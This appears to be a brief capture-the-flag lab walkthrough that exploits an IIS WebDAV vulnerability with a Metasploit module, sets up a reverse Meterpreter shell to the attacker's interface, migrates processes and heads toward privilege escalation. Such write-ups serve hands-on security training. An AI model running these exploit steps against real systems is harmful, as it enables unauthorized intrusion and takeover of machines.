Exploitation
Metasploit Exploitation
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOST 10.10.10.14
set LHOST tun0
run 
We have gotten a shell, unfortunatley, when we try to runn getuid it does not work and we get an error. This means we are running an unstable process. To fix this, we have to check what processes are running on the box and migrate to the one that is running with the same priveleges that the meterpreter session is running with.

Now we have a stable working meterpreter session. We have low privleges, however we need to Escalate to SYSTEM. Put the session in background and use local exploit suggestor local_exploit_suggester
Last updated
Was this helpful?